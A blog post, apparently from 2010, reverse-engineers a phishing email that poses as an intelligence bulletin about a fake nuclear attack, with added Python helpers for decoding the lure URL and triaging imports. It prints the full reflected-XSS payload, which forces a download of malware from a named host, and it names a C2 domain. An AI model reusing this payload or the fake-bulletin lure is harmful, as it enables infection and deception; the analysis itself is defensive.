Reverse Engineering a Phishing E-Mail
So the other day, I came out of the movie theater and checked my iPhone to see what I missed while being entertained by Alice in Wonderland. In my AKO mail was a curious looking message about North Korea having tested a missile with a nuclear detonation in Okinawa, Japan. The message indicated alerts being made for pending mobilization of military units. WTF?
Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY
(U//FOUO) DPRK has carried out nuclear missile attack on Japan
06 March 2010
(U//FOUO) Prepared by Defense Intelligence Agency
(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US
seismographic stations recorded seismic activity in the area of Okinawa Island
(Japan). According to National Geospatial-Intelligence Agency, Democratic
People's Republic of Korea has carried out an average range missile attack
with use of nuclear warhead. The explosion caused severe destructions in the
northern part of the Okinawa island. Casualties among the personnel of the US
military base are being estimated at the moment.
(U//FOUO) In connection with the occurred events, it is necessary for the
personnel of the services listed below to be ready for immediate mobilization:
CENTRAL INTELLIGENCE AGENCY
DEFENSE INTELLIGENCE AGENCY
DEPARTMENT OF ENERGY:
OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE
DEPARTMENT OF HOMELAND SECURITY:
OFFICE OF INTELLIGENCE AND ANALYSIS
DEPARTMENT OF STATE:
BUREAU OF INTELLIGENCE AND RESEARCH
DEPARTMENT OF THE TREASURY:
OFFICE OF INTELLIGENCE AND ANALYSIS
DRUG ENFORCEMENT ADMINISTRATION:
OFFICE OF NATIONAL SECURITY INTELLIGENCE
FEDERAL BUREAU OF INVESTIGATION
NATIONAL SECURITY BRANCH
NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY
NATIONAL RECONNAISSANCE OFFICE
NATIONAL SECURITY AGENCY
UNITED STATES AIR FORCE
UNITED STATES ARMY
UNITED STATES COAST GUARD
UNITED STATES MARINE CORPS
UNITED STATES NAVY
________________
(U//FOUO) Additional information can be found in the following report:
http://www.mod.gov.ge/2007/video/movie.php?
l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69
%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64
%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c
%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74
%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c
%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27
%29%3c%2f%73%63%72%69%70%74%3e%3c%22
________________
Office of the Director of National Intelligence
Washington, D.C. 20511
Naturally not clicking on the link for additional information, I turned to CNN, BBC and Google to confirm I did not miss Japan becoming the world's only nuclear triple-crown winner. After a cursory search, it appeared Japan was still merely a champion of the nuclear doubleheader. It irritated me though that I was getting these phishing e-mails so I decided to see where they were coming from.
For starters, what were the substitutions hiding? A sequence like %20 is percent-encoding: the two hex digits are the ASCII code of one character, in this case 0x20 (or 20h, depending on your preference), a space. Because a URL cannot contain a literal space, the encoding lets a URL carry %20 in its place. Digital miscreants typically use it for inserting shellcode in a text string, but it can also be used to hide real text as numbers. Consulting a friendly ASCII table with hexadecimal lookups translates the "helpful link" into:
http://www.mod.gov.ge/2007/video/movie.php?l=G&v="><a href="http://officialweightlosshelp.org/wp-admin/report.zip">Download </a><script>window.open('http://officialweightlosshelp.org/wp-admin/report.zip')</script><"
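As an added example (my code, not part of the original post), here is the percent-decoding described above applied to the lure URL, done in the order a browser or server script does it: split the query on `&` and `=` first, then decode each value. The function names and the "suspicious parameter" report format are my own.

```python
import re
from urllib.parse import urlsplit

# The lure URL from the phishing message, reassembled onto one line.
PHISH_URL = (
    "http://www.mod.gov.ge/2007/video/movie.php?l=G&v="
    "%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69"
    "%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64"
    "%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c"
    "%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74"
    "%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c"
    "%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27"
    "%29%3c%2f%73%63%72%69%70%74%3e%3c%22"
)

def percent_decode(text):
    """Turn each %XX escape into the character with that hex ASCII code
    (the table lookup the post does by hand; ASCII-only, as in this URL)."""
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)

def triage_url(url):
    """Split the query into name/value pairs before decoding, the way a browser
    or PHP does, then report values carrying HTML markup together with any
    absolute URLs hidden inside them (the real download location)."""
    parts = urlsplit(url)
    suspicious = {}
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = percent_decode(raw)
        if re.search(r"<\s*/?\s*(a|script|iframe|img)\b", value, re.I):
            suspicious[name] = {
                "decoded": value,
                "embedded_urls": sorted(set(re.findall(r"https?://[^\s'\"<>]+", value))),
            }
    return {"host": parts.hostname, "path": parts.path, "suspicious_params": suspicious}

if __name__ == "__main__":
    report = triage_url(PHISH_URL)
    print("lure host:", report["host"], report["path"])
    for name, info in report["suspicious_params"].items():
        print(f"parameter {name!r} injects markup:\n  {info['decoded']}")
        print("  real download location(s):", ", ".join(info["embedded_urls"]))
```

The decoded `v` parameter closes the attribute it lands in with `">` and then supplies its own anchor and script, which is why the page on mod.gov.ge reflecting that parameter unescaped turns a government link into a forced download.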
So I turned to my VirtualBox testing environment from when I wrote What Traffic is on a TOR Relay and accessed the two websites to check them out safely without harming my machine.
At first glance, it would seem a site in Georgia was being exploited by a cross-site scripting attack to redirect a viewer to a site that had previously been hacked (or fictitiously created) for file storage. Again, at just a first glance, somebody might suspect Russian hackers, given their previous cyber issues with Georgia and the targeting of American military personnel over AKO. But that's just speculation - I'm not spending enough time on this to derive evidence to prove or disprove that theory.
Ultimately, all that really matters is that the attack is designed to download the file report.zip to the user's computer. A hex analysis showed it to be a true ZIP file, so I used gzip in Linux to decompress it and then looked at the EXE file with a hex editor.
The dump of the imports section of the Portable Executable file reveals what functions this little program uses from various DLLs and Win32 API calls. It's a little easier to read by simply running strings report.exe from the command line to dump the human-readable strings, in lieu of finding them amidst the hexadecimal codes.
FormatMessageA CloseHandle ReadFile CreateFileA ExitProcess GetFileType HeapReAlloc WaitForSingleObject GetCurrentThread LoadLibraryA Sleep GetStdHandle HeapAlloc HeapFree GetProcessHeap GetVersion GetCommandLineA GetModuleHandleA KERNEL32.dll
InsertMenuW LoadMenuW DrawIconEx CheckMenuItem DispatchMessageA PostThreadMessageA CharNextExA LoadStringA wsprintfA ExitWindowsEx CloseClipboard SetClipboardData EmptyClipboard OpenClipboard DrawMenuBar RemoveMenu CheckMenuRadioItem PostQuitMessage TranslateMessage DispatchMessageW USER32.dll
ControlService CloseServiceHandle LookupPrivilegeValueA AdjustTokenPrivileges SetServiceStatus SetSecurityDescriptorDacl RegisterServiceCtrlHandlerA RegEnumKeyA RegSetValueExA InitializeSecurityDescriptor StartServiceCtrlDispatcherA RegQueryValueExA RegOpenKeyExA RegCloseKey ADVAPI32.dll
WS2_32.dll
strcat strcmp strchr MSVCRT.dll
_exit _XcptFilter exit __p___initenv __getmainargs _initterm __setusermatherr _adjust_fdiv __p__commode __p__fmode __set_app_type _except_handler3 _controlfp
Now, without having to bother stepping through the code itself, it should be intuitively obvious to the most casual observer (as my high school physics teacher used to say) that the function calls cluster around privilege checks, registry access, heap calls, service control and the Windows clipboard. Those sound like the functions necessary for heap and buffer overrun exploitation, with checks to confirm escalated privilege. That suggests the bug is probably the result of a race condition, hence the privilege check prior to installing whatever final features it deploys as a Windows service. More than likely, now that the host is part of a BotNet, the remainder of the infection code (probably a rootkit) will be downloaded from a control center and installed under the newly assumed administrator privileges. No obvious strings existed for network access to obtain the remainder of the code, so it's likely the code itself is obfuscated by an internal encryption algorithm - which is fine, because I didn't want to spend time decoding opcodes anyway.
Instead, I simply cloned a Windows sandbox in VirtualBox and allowed the infection to install itself while monitoring network activity with Wireshark. Running a stock Windows XP without any service packs, I accessed the Georgian Ministry of Defense page via the URL, whereupon the script did in fact execute the downloaded report.exe file. Wireshark showed name resolution and subsequent activity to updatekernel.com, which was the predicted behavior. This server has previously been identified as Chinese, in association with command and control for the Kneber BotNets and other identity-theft phishing activities. Needless to say, this variant did not show up on either the Symantec or ClamAV virus scanners, which may be a function of encrypting obfuscation or simply an updated variant with a new signature.
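To make the import triage above reproducible, here is an added example (my code, not the post's) that groups the strings output by DLL and maps the imported names to the behaviours an analyst flags. The capability table and function names are my own, and the embedded copy of the strings output omits the CRT start-up names that follow MSVCRT.dll.

```python
# Import names as strings(1) listed them on the page (constructed copy, CRT start-up
# names omitted). In an import name table the DLL name string normally follows the
# names imported from it, so a ".dll" token closes the group of names before it.
STRINGS_OUTPUT = """
FormatMessageA CloseHandle ReadFile CreateFileA ExitProcess GetFileType HeapReAlloc
WaitForSingleObject GetCurrentThread LoadLibraryA Sleep GetStdHandle HeapAlloc HeapFree
GetProcessHeap GetVersion GetCommandLineA GetModuleHandleA KERNEL32.dll
InsertMenuW LoadMenuW DrawIconEx CheckMenuItem DispatchMessageA PostThreadMessageA
CharNextExA LoadStringA wsprintfA ExitWindowsEx CloseClipboard SetClipboardData
EmptyClipboard OpenClipboard DrawMenuBar RemoveMenu CheckMenuRadioItem PostQuitMessage
TranslateMessage DispatchMessageW USER32.dll
ControlService CloseServiceHandle LookupPrivilegeValueA AdjustTokenPrivileges
SetServiceStatus SetSecurityDescriptorDacl RegisterServiceCtrlHandlerA RegEnumKeyA
RegSetValueExA InitializeSecurityDescriptor StartServiceCtrlDispatcherA RegQueryValueExA
RegOpenKeyExA RegCloseKey ADVAPI32.dll
WS2_32.dll
strcat strcmp strchr MSVCRT.dll
"""

# Behaviours worth flagging in triage, keyed by the APIs that implement them (my table).
CAPABILITIES = {
    "service install/control": {"StartServiceCtrlDispatcherA", "RegisterServiceCtrlHandlerA",
                                "SetServiceStatus", "ControlService"},
    "privilege adjustment": {"LookupPrivilegeValueA", "AdjustTokenPrivileges"},
    "registry access": {"RegOpenKeyExA", "RegQueryValueExA", "RegSetValueExA", "RegEnumKeyA"},
    "clipboard access": {"OpenClipboard", "EmptyClipboard", "SetClipboardData"},
    "dynamic API resolution": {"LoadLibraryA", "GetModuleHandleA"},
}

def group_imports(text):
    """Return {dll: [imported names]} from whitespace-separated strings output."""
    groups, pending = {}, []
    for token in text.split():
        if token.lower().endswith(".dll"):
            groups[token] = pending  # this DLL owns every name seen since the last one
            pending = []
        else:
            pending.append(token)
    return groups

def triage(groups):
    """Map imported names to capabilities and flag DLLs that show no names at all."""
    names = {n for funcs in groups.values() for n in funcs}
    present = sorted(cap for cap, apis in CAPABILITIES.items() if apis & names)
    # A DLL with no named imports gave strings(1) nothing to print: the binary most
    # likely imports from it by ordinal number, which leaves no function name behind.
    ordinal_only = sorted(dll for dll, funcs in groups.items() if not funcs)
    return {"capabilities": present, "ordinal_only": ordinal_only}

if __name__ == "__main__":
    result = triage(group_imports(STRINGS_OUTPUT))
    print("capabilities:", ", ".join(result["capabilities"]))
    print("DLLs with no named imports (ordinal imports?):", result["ordinal_only"])
```

WS2_32.dll appearing with no names next to it is the usual strings-output signature of import by ordinal, which ws2_32.lib commonly links by, so the absence of socket API names alone does not tell you whether the binary contains network code.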
[Post Edit 1] I actually re-ran this test today and found that the particular link apparently no longer works. It would seem the Georgian Ministry of Defense patched the vulnerability on their website that allowed the link to go through, but I'd saved a copy of the report.exe binary from before. I reverted the Windows XP sandbox to a pre-infection VirtualBox snapshot in order to install Service Pack 2, a necessary requirement for installing Process Monitor from Mark Russinovich's fabled SysInternals toolkit. The output above shows where Process Monitor logged all of report.exe's registry and filesystem activity as it executed. A complete 35-page log is available here for your own perusal, but a lot of the activity focuses on browsing the Internet cache, the stored certificates and the cryptographic functions. There was also a series of tests regarding registry accesses and post-clipboard functions. A more thorough analysis with a Win32 debugger, correlating each activity to a code section, would of course provide a more detailed breakdown. The bottom line: it takes under two seconds for the code to execute, compromise your system and locate information that could be used to impersonate you or clone your credentials.
Let this be just another simple lesson of why you should not click on links sent to you in e-mails. Unless you like being part of a Russian/Chinese/DPRK BotNet and having your identity stolen.
[Post Edit 2] I couldn't resist. My cousin pointed me towards a shareware Win32 debugger called OllyDbg, so I went ahead and copied that into my sandbox. The last time I used to do this sort of thing, I was using the old-school DOS debug and Borland debuggers. Once again, I reverted to an older, pre-infection snapshot and loaded the report.exe file. Just as predicted, while the code loaded and OllyDbg performed its heuristic analysis, it indicated the primary code section was likely compressed or encrypted (as any attack should be). I think I've found my next source of distraction; I'm not going to be able to resist diving back into the world of reversing code puzzles. 0111 1010 0110 1001